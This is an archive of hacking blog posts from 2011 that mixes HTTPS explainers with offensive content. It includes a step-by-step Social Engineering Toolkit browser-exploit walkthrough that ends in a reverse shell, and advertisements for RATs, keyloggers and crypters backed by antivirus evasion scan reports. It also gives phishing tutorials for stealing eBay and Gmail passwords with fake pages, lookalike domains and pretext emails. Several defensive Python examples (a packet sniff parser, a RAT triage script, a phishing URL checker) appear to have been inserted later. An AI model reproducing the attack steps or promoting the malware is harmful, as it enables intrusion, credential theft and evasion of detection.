Tuesday, July 26, 2011

Secure Sockets Layer (SSL) - An Introduction

In the OSI model, a reference model for effective communication, we find a layer named the transport layer. Just like the physical layer (where viruses normally attack), the transport layer also needs some sort of security, because the transport layer is responsible for the transmission of data.

So what actually makes transmission at the transport layer secure and protects the data from an intruder?

Have you ever noticed that when you visit some websites the address starts with http://, while on money-transfer and other important websites it starts with https://? The point is clear: https means secure communication, meaning the data transferred over this connection is secured using cryptographic techniques.

SSL, or Secure Sockets Layer, is a cryptographic protocol that provides secure communication over the Internet. So what actually is cryptography? "Cryptography is the science of secret communication".
SSL uses two keys to encrypt data − a public key known to everyone and a private or secret key known only to the recipient of the message.  

HTTP VS HTTPS 
 

The picture above shows that when ALICE sends confidential information over an insecure channel, there is a chance that the information (it might be credit card details, a password, etc.) will be sniffed. An attacker can easily sniff this data, read it, understand it and use it for illegal activities, because over a plain HTTP connection the data is transferred in plain text without any encryption.

Now consider the second picture, in which a user sends information over a secure channel. With HTTPS the data is first encrypted using a cryptographic technique and then sent over the channel, so anyone who sniffs the data is not able to understand it.

The picture above clearly shows that HTTPS is secure, but how is HTTPS secure? Because it uses Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL certificate.

Where there's a will there's a way. Following this quote, some researchers have discovered ways to crack/hack SSL certificates too. We will post an article on hacking SSL certificates later on.

Monday, July 25, 2011

Hacking Windows Using Social Engineering Toolkit and Backtrack 5

What is the Social Engineering Toolkit?
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET was written by David Kennedy (ReL1K) and, with a lot of help from the community, it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Actually, this hacking method works perfectly together with DNS spoofing or a Man in the Middle attack. In this tutorial I only write the how-to and the step-by-step for the basic attack; the rest you can modify with your own imagination.

In this tutorial we will see how this attack method can own your computer in just a few steps…
The chance of success of this attack depends on the victim's browser. If the victim never updates their browser, the chance can be 85% or more.


Requirement:
1. Backtrack 5 or Backtrack 4

Step By Step:
1. Change your working directory to /pentest/exploits/set/

2. Open the Social Engineering Toolkit (SET) with ./set and then choose "Website Attack Vectors", because we will attack the victim via the internet browser. In this attack the victim opens a website generated by the Social Engineering Toolkit, so choose "Website Attack Vectors" for this option.

3. Usually when users open a website, they don't think that they may be opening a suspicious website that includes a malicious script to harm their computer. In this option we will choose "The Metasploit Browser Exploit Method", because we will attack via the victim's browser.

4. In the next step just choose "Web Templates", because we will use the most famous websites around the world, which are already provided by the Social Engineering Toolkit.

5. There are 4 website templates ready to use for this attack method: GMail, Google, Facebook, and Twitter. In this tutorial I will use Google, but if you think Facebook or Twitter is better because it's the most accessed website, just change it to what you want.

6. For the next step, because we don't know which vulnerability will successfully attack the victim, what type of browser they use, etc., we just choose "Metasploit Browser Autopwn" to load all the vulnerabilities the Social Engineering Toolkit knows. This tool will launch all the exploits in the Social Engineering Toolkit database.

7. For the payload selection I prefer the most used, Windows Shell Reverse_TCP, but you can also choose another payload that is most comfortable for you.

8. The next step is to set up the connect-back port to the attacker computer. In this example I use port 4444, but you can change it to 1234, 4321, etc.

9. In the next step just wait until all processes have completed and the server is running.

10. When the link is given to the user, the victim will see a Google look-alike (fake website). When the page loads, it also loads all the malicious scripts to attack the victim's computer.

11. On the attacker computer, if there is any vulnerability in the victim's browser, it will return a sessions value, which means the exploit successfully attacked the victim's computer. In this case the exploit creates a new fake process named "Notepad.exe".

12. To view the active sessions already opened by the exploit, type "sessions -l" to list the active sessions. Take a look at the ID… we will use that ID to connect to the victim's computer.

13. To interact with and connect to the victim's computer, use the command "sessions -i ID". ID is the numerical value given when you run sessions -l. For an example, see the picture below.

14. The victim's computer is now owned. I practiced creating this tutorial using a virtual machine, so it will not harm other computers, and you can also do a lot of experimenting with your OS.

Darkcomet Crypter





Add Icon For Fud Result working with all rats and stlrs

File Info

Report date: 2011-04-23 10:12:40 (GMT 1)
File name: darkcomet-crypter-exe
File size: 1167360 bytes
MD5 Hash: 703fd6381d6585a2d5bcb499d8ca7119
SHA1 Hash: cf2d12fd5cb1feb3cede887d3176d00bc1064b62
Detection rate: 4 on 10 (40%)
Status: INFECTED

Detections

Avast -
AVG -
Avira AntiVir - TR/Dropper.Gen
ClamAV -
Comodo -
Emsisoft - HackTool.Win32.VB.jz!IK
F-Prot - W32/VBTrojan.17!Generic
Ikarus - HackTool.Win32.VB.jz
TrendMicro -
Zoner -

Scan report generated by


The Difference Between HTTP and HTTPS

HTTPS: Hyper Text Transfer Protocol Secure. HTTPS is a combination of the Hyper Text Transfer Protocol and the Secure Sockets Layer (SSL) / Transport Layer Security (TLS) protocol that provides encrypted communication between a web server and a client. HTTPS is usually used for internet banking, payment transactions, login pages, etc. This protocol uses port 443 for communication.
Websites that already use this protocol include GMail.com, as well as PayPal, Amazon, etc.
Let's look at the connection between our computer and the web server when we connect over HTTPS, using netstat -an.
As we can see from the picture, the client computer opened random local ports that connect to port 443 on the server side.


Is HTTPS (Hyper Text Transfer Protocol Secure) Secure?
To answer this question, let's look at the experiment below.
In this experiment there are two people on one wireless network, BadGuy and NiceGuy. NiceGuy tries to open http://gmail.com and then log in to it. In a different place, BadGuy is on the same wireless network as NiceGuy, as shown in the picture below:
When BadGuy tries to capture all packet data to and from the access point, the result is different when NiceGuy uses HTTPS for his connection. For a clearer description, see the image below of NiceGuy entering his username and password on the GMail login page.
As you can see in the picture above, the connection between the client and the web server uses https://. Now let's see what BadGuy does once NiceGuy is using HTTPS for his connection. BadGuy really likes Wireshark, so he tries again to capture the data, hoping there is something interesting there.
BadGuy didn't find any plain data there; all data sent to or from the server is encrypted. The picture above is the login information (maybe) that BadGuy captured, but I think BadGuy cannot break the encrypted data in just a few days, months or years, or maybe we can call it "impossible" (we still don't know how long it would take to break it).


HTTPS Conclusion
Packet data sent using HTTPS is encrypted, so no one on a public network can see the data inside the packets. That's why HTTPS is usually used for banking or transactions on the internet, and for login pages or other pages that need to encrypt data.
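
The difference BadGuy sees in the capture, as an added example that is not part of the original post: the code takes the raw TCP payload of a login request and reports what a passive observer can read from it. Both payloads, the host name and the credentials are constructed for illustration.

```python
import struct
from urllib.parse import parse_qsl

# TLS record-layer content types (RFC 5246).
TLS_CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert",
                     22: "handshake", 23: "application_data"}
MAX_RECORD_LEN = 2**14 + 2048  # upper bound for an encrypted record body

# Constructed capture payloads; host name and credentials are invented.
HTTP_PAYLOAD = (b"POST /login HTTP/1.1\r\n"
                b"Host: mail.example.test\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n"
                b"Content-Length: 33\r\n\r\n"
                b"user=niceguy&passwd=correct-horse")
# One stub handshake record followed by one application_data record whose
# 32 body bytes stand in for ciphertext.
TLS_PAYLOAD = (bytes([22, 3, 1, 0, 4]) + b"\x01\x00\x00\x00"
               + bytes([23, 3, 3, 0, 32]) + bytes(range(200, 232)))


def parse_tls_records(data):
    """Return [(content_type, version, length)], or [] if data is not TLS."""
    records, offset = [], 0
    while offset + 5 <= len(data):
        ctype, major, minor, length = struct.unpack_from("!BBBH", data, offset)
        if (ctype not in TLS_CONTENT_TYPES or major != 3
                or length > MAX_RECORD_LEN):
            return []  # header does not look like a TLS record
        if offset + 5 + length > len(data):
            break  # record continues in a later TCP segment
        # Version 3.1 is TLS 1.0 and 3.3 is TLS 1.2 on the wire.
        records.append((TLS_CONTENT_TYPES[ctype], f"{major}.{minor}", length))
        offset += 5 + length
    return records


def visible_to_sniffer(payload):
    """Summarise what a passive capture of this TCP payload reveals."""
    records = parse_tls_records(payload)
    if records:
        # Only record type, version and size are readable; the body is opaque.
        return {"protocol": "tls", "records": records, "form_fields": {}}
    head, _, body = payload.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    if " HTTP/1." not in request_line:
        return {"protocol": "unknown", "form_fields": {}}
    # Plain HTTP: the submitted form, credentials included, is readable.
    fields = dict(parse_qsl(body.decode("latin-1")))
    return {"protocol": "http", "request": request_line, "form_fields": fields}


if __name__ == "__main__":
    for name, payload in (("http", HTTP_PAYLOAD), ("https", TLS_PAYLOAD)):
        print(name, visible_to_sniffer(payload))
```
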

Sunday, July 24, 2011

XtremeRAT v2.7.1


This is a tool that allows you to control your computer from anywhere in the world.
With full support for Unicode languages, you will never have a problem using this software.
Here you can find new updates, information and tutorials about this software.

Version 2.7 (18/05/2011) Last Update

- Added USB Spreader.
- Added Mouselogger.
- Added upload files and execute directly.
- Webcam function changed.
- Some language corrections.
- Select webcam and desktop capture functions to start automatically.
- New method to identify your servers.
- Corrected some bugs using preview images in File Manager.
- Upload files to FTP server using File Manager.
- Corrected some bugs using grab passwords function.


File Info

Report date: 2011-05-20 17:48:33 (GMT 1)
File name: cliente-exe
File size: 3517440 bytes
MD5 Hash: 86a349f2becb28bead0cabcfc4264579
SHA1 Hash: 4bffdda39c1f78edcb4c90a6a03756ca424f7
Detection rate: 1 on 6 (17%)
Status: INFECTED

Detections

AVG -
Avira AntiVir -
ClamAV -
Emsisoft -
TrendMicro -
Zoner - TrojanDownloader.Delf.PYW

Scan report generated by

xtreme rat v2.9


Version 2.9 (19/06/2011)
Here some changes since last version: Please, update your servers.

- Corrected a bug in file manager using "run with params".
- Corrected error when open keylogger function.
- Added no injection option.
- Added option to select capture audio automatically.
- Added new special folders in file manager.
- Corrected a tray icon bug.
- Added auto update function.
- Added an option to block connections from IP list.
- Corrected flags problem.
- Corrected chrome passwords.
- Corrected a bug using download files in file manager.
- Added a button in file manager to update drives and network connections list.
- Added in file manager a new thumbnail preview function.
- Added CPU usage column in process manager.
- Added mass search files.
- Added an option to open directory of the selected process in process manager.
- Added a funny option into window manager: Crazy Window.
- Added disconnect server option.

How to Know if You Are Infected with RATs or Keyloggers



In this post I am going to show you how to find out whether you are infected with a RAT or keylogger without using any complex tools. I believe most of you know that a RAT or keylogger needs an internet connection to work, which means that if you are not connected to the internet you don't have to worry about being infected with a RAT or keylogger. So, for those who have an internet connection and think they are infected with a Trojan, here is a little guide that can solve your problem.

1. Every program has its own process, which can be seen in Task Manager. So the first thing to do is to find out which process the Trojan is attached to. If you see an unknown process, search for it on Google. A good hacker will always make sure he hides his process behind a Windows-based process name, e.g. svchost.exe or something like that.

2. If you can't find it, the next thing you can do is use cmd (to open the command prompt, click on Start ---> Accessories --> Command Prompt).

3. Once the command prompt is open, use this command: netstat -an |find /i "listening"
Note: The NETSTAT command will show you whatever ports are open or in use, but it is NOT a port scanning tool!

What does this command do?

This command shows all the open ports. Now check for any unknown port.

4. You can skip step 3 if you want and do this instead.

Open the command prompt and type
 netstat -b

This command will show you the active connections together with the process, its PID (Process Identifier) and also the packets.
Look out for SYN packets and the foreign address the process is connecting to, check the process it is associated with, and check the ports too. If you find that it is connecting to some unknown ports, then you can say you have been backdoored.

5. Go to Task Manager. At the top, click on View ---> Select Columns ---> tick PID (Process Identifier).
Match the suspicious process with the processes in Task Manager, checking the PID as well.

Most RATs reside in startup. How do you delete them from startup?

a) Go to regedit ---> HKLM\Software\Microsoft\Windows\CurrentVersion\Run
On the right-hand side, check for the process name you found in step 4. If it's not there, check at
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
OR
Open the command prompt and type start msconfig. Go to the Startup tab; you can check the startup processes there.
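
Steps 1 to 5 above, automated as an added example that is not part of the original post: it reads `netstat -ano` output (the `-o` switch adds the owning PID column), joins it to a process list, and flags unexpected ports and Windows process names running from the wrong folder. The sample output, the process paths and the lists of expected ports are constructed assumptions; port 4444 is the connect-back port used in the SET post on this page.

```python
import ntpath

# Constructed sample of `netstat -ano` output. Addresses come from
# documentation ranges; PIDs and ports are invented.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       868
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5110           0.0.0.0:0              LISTENING       3120
  TCP    192.168.1.20:49712     203.0.113.15:443       ESTABLISHED     2216
  TCP    192.168.1.20:49733     198.51.100.7:4444      ESTABLISHED     3120
  TCP    192.168.1.20:49740     198.51.100.7:4444      SYN_SENT        3120
  UDP    0.0.0.0:5355           *:*                                    1284
"""

# Constructed PID -> image path map, as a process listing with paths gives.
SAMPLE_PROCESSES = {
    4: "System",
    868: r"C:\Windows\System32\svchost.exe",
    1284: r"C:\Windows\System32\svchost.exe",
    2216: r"C:\Program Files\Mozilla Firefox\firefox.exe",
    3120: r"C:\Users\alice\AppData\Roaming\svchost.exe",
}

# Assumptions for this host: normal ports, and names that belong to Windows.
EXPECTED_LISTEN = {135, 445}
EXPECTED_REMOTE = {80, 443}
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "services.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def parse_netstat(text):
    """Yield (local_port, remote_port, state, pid) for each TCP row."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue  # headers, blank lines and UDP rows (no State column)
        _, local, remote, state, pid = parts
        yield (int(local.rsplit(":", 1)[1]), int(remote.rsplit(":", 1)[1]),
               state, int(pid))


def triage(netstat_text, processes):
    """Return {pid: sorted reasons} for processes worth a closer look."""
    findings = {}
    for lport, rport, state, pid in parse_netstat(netstat_text):
        reasons = findings.setdefault(pid, set())
        if state == "LISTENING" and lport not in EXPECTED_LISTEN:
            reasons.add(f"listening on unexpected port {lport}")
        if state in ("ESTABLISHED", "SYN_SENT") and rport not in EXPECTED_REMOTE:
            reasons.add(f"outbound connection to unexpected port {rport}")
        # A Windows process name outside the system folders is the
        # "hidden behind svchost.exe" case from step 1.
        path = processes.get(pid, "")
        name = ntpath.basename(path).lower()
        if name in SYSTEM_NAMES and ntpath.dirname(path).lower() not in SYSTEM_DIRS:
            reasons.add(f"{name} running from {ntpath.dirname(path)}")
    return {pid: sorted(r) for pid, r in findings.items() if r}


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_NETSTAT, SAMPLE_PROCESSES).items():
        print(pid, SAMPLE_PROCESSES.get(pid, "<unknown>"))
        for reason in reasons:
            print("   -", reason)
```

A flagged PID is then the one to look for in the Run keys and the msconfig Startup tab described above.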




I hope this tutorial was easy and comprehensive.

Saturday, July 23, 2011

Albertino Advanced RAT & Binder v4.2


Features:

- Polymorphic STUB
- Flags
- Multi-Tasking (Control all features on same client simultaneously.)
- Reverse Connection (Connect Behind Routers)
- UPnP Manager (Run RAT without port forwarding) (on most routers)
- Multi-Clients Management (Control few clients simultaneously)
- Remote Client Information (Basic client info)
- Last 25 visited web pages
- Send Fake Messages
- Funny Stuff (Hide Desktop Icons, Hide Start Button, Hide Task Bar, Open-Close CD-Rom, Flip Screen, Swap Mouse buttons, Lock CTRL+ALT+DEL and more)
- IE Options (Get Version, Change Home Page, Change IE Title, Open Website.)
- Control Panel (Shutdown PC, Restart PC, Logoff User)
- Clipboard Manager (Get Clipboard, Set Clipboard, Clear Clipboard.)
- Remote Server Download (Download files and execute them.)
- Printer Manager (Print to Default Printer)
- File Manager (Download and Upload Locally, Execute, Delete File, Delete Folder, Make Folder, Rename, File Size)
- Search Files (Search for any file or type on remote PC.)
- Keylogger (Get all keystrokes from remote PC.)
- Remote Passwords (FF 2,3 and 3.5+, IE7-8, Chrome, MSN (+Live Messenger), Trillian, IMVU, Pidgin, No-IP, DyDNS, FileZilla, Outlook (no drops or external references))
- Processes Manager (List all running processes with the ability to close selected.)
- Services Manager (List all services, Stop-Start Service, Disable-Manual-Autostart Service.)
- Windows Manager (Control Opened Windows (Close, Hide, Minimize, Maximize, Restore, Default, No Active))
- Remote Desktop (Watch Live Remote Desktop with ability to change Image Quality, Remote Control and many others))
- Remote WebCam (Watch Live Remote WebCam (Save capture as video to file as XVID, DIVX and others))
- Registry Editor (List, Create, Edit, Delete registry keys)
- Send to All (Download and run file from website to all clients, Upload and run file from your PC to all clients, Run a DDOS (small bot))
- Command Prompt Line (Manage remote cmd as your own.)
- Client Geo Location
- Multi Binder Included. (New polymorphic technology method)
- Icon Changer
- Assembly Editor

Rapzo logger 1.8.2 Private Cracked


NVT Scan Result:



File Info

Report date: 2011-03-14 10:04:43 (GMT 1)
File name: express-exe
File size: 353280 bytes
MD5 Hash: 450b9c228262616aef4d7b0c3a5da1f2
SHA1 Hash: d5e489a2f9176b4d0cd47a43e4dab6a4d83eb019
Detection rate: 5 on 9 (56%) 
Status: INFECTED 


Detections


Avast - Win32:Spyware-gen [Spy]
AVG - Dropper.Generic3.NMD
ClamAV - 
Comodo - 
Emsisoft - Trojan-Spy.MSIL!IK
F-Prot - 
Ikarus - Trojan-Spy.MSIL
TrendMicro - 
Zoner - Dropper.Generic3.NPG



Scan report generated by

HackHound Crypter


File Info

Report date: 2011-04-17.
File name: DSC104.exe
File size: 384657 bytes
MD5 Hash: 9f56208325bd040a86be7a4a81b7bc2d 
SHA1 Hash: 5eb7819403470c309d21017908c57376d610c9ea 
Detection rate: 0 out of 33 
Status: CLEAN 


Detections


AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -Clean.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -Clean.
F-Secure Internet Security -Clean.
G Data -Clean.
IKARUS Security-Clean.
Kaspersky Antivirus -Clean.
McAfee -Clean.
MS Security Essentials -Clean.
ESET NOD32 -Clean.
Norman -Clean.
Norton -Clean.
Panda Security -Clean.
A-Squared Security -Clean.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -Clean.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.


Scan report generated by


For those who said the myavscan.com result is fake,
here is the Novirusthanks result of crypted cybergate


File Info


Report date: 2011-04-17 19:15:29 (GMT 1)
File name: dsc104-exe
File size: 384657 bytes
MD5 Hash: 9f56208325bd040a86be7a4a81b7bc2d
SHA1 Hash: 5eb7819403470c309d21017908c57376d610c9ea
Detection rate: 0 on 10 (0%) 
Status: CLEAN 


Detections


Avast - 
AVG - 
Avira AntiVir - 
ClamAV - 
Comodo - 
Emsisoft - 
F-Prot - 
Ikarus - 
TrendMicro - 
Zoner - 


Scan report generated by



p-s-s-s : U2ZTVlR0U3VUNFdyZWZTa1N0Z2tlZlNz
Crypted With ARMON-64-->ATOM-128-->B A S E-64 ( last without space)

Friday, July 22, 2011

How To Hack eBay User ID and Password

Today I want to teach you how to hack an eBay account password. For this I'll be using phishing. Phishing is one of the easiest ways to hack ANY site's user names and passwords. You upload a fake webpage that looks like the legit one, then you send the link to your victim and trick him into entering his login info into the fake webpage, which then sends the info to you. It's very simple and very effective.


 How to hack eBay account password

1. First you need to download eBay Phisher

2. The downloaded file contains:

* ebay.html
* ebaylogin.php
* log.txt


3. Now upload these three files to a free webhost site. You can try

Your Free Hosting
Free Web Hosting
Reliable Free Hosting
cPanel Hosting
T35 Hosting
FREE Website Hosting & Premium Web Hosting
110mb.com
www.esmartstart.com
4. After that, send this phisher link (ebay.html) to your victim and make him log in to his eBay account using the phisher you sent.

5. Once he logs in to his eBay account using the phisher, the eBay ID and password he typed are stored in "log.txt".

6. Now open log.txt to get the hacked eBay ID and password, as shown.

That's it. I hope this phishing tutorial is foolproof and you can now hack an eBay account password using eBay phishing. I have tried to keep this eBay phishing tutorial simple for you to hack eBay account password.

How to Hack Gmail Account Password ?

Hi friends, this is the best way to hack a Gmail account for passwords, tried it myself and it worked!!!
Things that you need for hacking a Gmail account password:
1. Gmail Phisher
2. Free Web hosting Site
3. Little bit of manual Work 

Introduction to Phishing

If you know a little bit about hacking, then you must know about phishing, i.e. what phishing is, how it works and, most importantly, how you can protect yourself from falling into the trap. I will try to explain all of these in my article.
First of all, what are phish pages and what is phishing? Phish pages are basically fake or virtual pages that look similar to the original website's page. The only difference is the batch program running in the background, i.e. the original webpage sends requests to the Gmail server while the phish page sends requests to the hacker's PHP server. Phishing is a password hacking technique commonly used by hackers, using phish pages that look similar to the original web page. The only difference is the URL in the address bar, so one important tip for you all: always check the address bar when going to any website.
Now, what is smart phishing? A normal phishing page sends the password to the hacker but doesn't redirect the page to the original website, whereas smart phishing does. This means the victim never knows what really happened and that his account got hacked. He will only think that he entered the wrong password, since on the second attempt the web page is the original and he is able to log in. The most fantastic thing is that the original redirected page has the username already entered in it, which makes it even smarter.


Now let's come to how it works. When a user types a username and password into the text box, the info is sent to "login.php", which acts as a password logger and redirects the page to "LoginFrame2.htm", which shows "There has been a temporary error Please Try Again". When the person clicks on try again, it redirects to the actual URL, so that the victim does not know that your site is a fake site and gets his gmail.com password hacked.


HACKING GMAIL ACCOUNT STEP WISE:
1. First of all download the Gmail Phisher.

2. Extract the rar file now you will get three files as given below:
gmail.html 
log.txt 
mail.php 


3. Upload all three files to any free web hosting server. Remember, while creating the account on these servers, to choose a username as close as possible to the original URL, like mail.gmaile or maile.gmall etc., as this is the most crucial step. Some free web hosting servers are given below; you can also find a few more for yourself.


www.yourfreehosting.net
www.esmartstart.com
www.110mb.com
www.drivehq.com
www.t35.com


4. Once you have uploaded all three files to the web hosting server, you have to send them to your victim. This is the most important step of the smart phishing technique.
Most people use the same password for Orkut and Gmail, and this is where the main hack lies. You send the victim an HTML email that looks similar to an Orkut scrap; you can easily do this with simple editing of an existing mail. You just have to change the link to your phish link and the content according to the person's likings, so that he will surely fall into the trap.
Another technique is to send him a request to join a particular community in the format Orkut uses.
And last but most important, send him a mail from Gmail Admin such as "We have seen illegal activity from your account and you need to verify your account and your account is temporarily disabled after this login. To unlock your account Verify your Email", and in that link put your phish link. Now you will all know how it works. If you want to protect yourself, you must know what techniques a hacker can use to hack your Gmail account.

5. After sending the phisher to the victim, once the user logs in to his Gmail account using your phisher, his user ID and password are ours. These are stored in log.txt. All you have to do is refresh your web hosting account files.




6. The log.txt file will contain the passwords and look like this:


That's all. Now you have hacked the password of the victim. I hope you all have liked it.



NOTE: This is for Educational Purpose Only. Isoftdl is not responsible for any damage done by You.
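
The address-bar check recommended in the two phishing posts above, written as a defender's filter; this is an added example, not code from the original posts. It compares the host of a login URL against a trusted list and flags near-miss spellings such as the `gmaile` and `gmall` labels the post mentions. The trusted hosts, brand list, ignored labels and sample URLs are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Assumptions (not from the post): the login hosts users should ever see,
# the brand names to protect, and labels too common to compare with brands.
TRUSTED_HOSTS = {"mail.google.com", "accounts.google.com", "signin.ebay.com"}
BRANDS = ("gmail", "google", "ebay")
COMMON_LABELS = {"www", "mail", "login"}


def edit_distance(a, b):
    """Levenshtein distance between two short strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete from a
                           cur[j - 1] + 1,              # insert into a
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def check_login_url(url):
    """Return (verdict, reason) for a URL that asks for credentials."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in TRUSTED_HOSTS:
        if parts.scheme != "https":
            return ("warn", "trusted host but not HTTPS")
        return ("ok", "exact match with a trusted login host")
    # Split on dots and hyphens so "ebay-login" is compared as "ebay", "login".
    for label in host.replace("-", ".").split("."):
        if label in COMMON_LABELS:
            continue
        for brand in BRANDS:
            if label == brand:
                return ("suspicious", f"brand '{brand}' in untrusted host {host}")
            if edit_distance(label, brand) == 1:
                return ("suspicious", f"label '{label}' resembles '{brand}'")
    return ("unknown", "host is not on the trusted list")


# Constructed sample URLs under reserved example domains.
SAMPLE_URLS = [
    "https://mail.google.com/mail/",
    "http://maile.gmall.example.test/gmail.html",
    "http://ebay.secure-login.example.test/ebay.html",
    "https://example.org/",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(check_login_url(url), url)
```
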
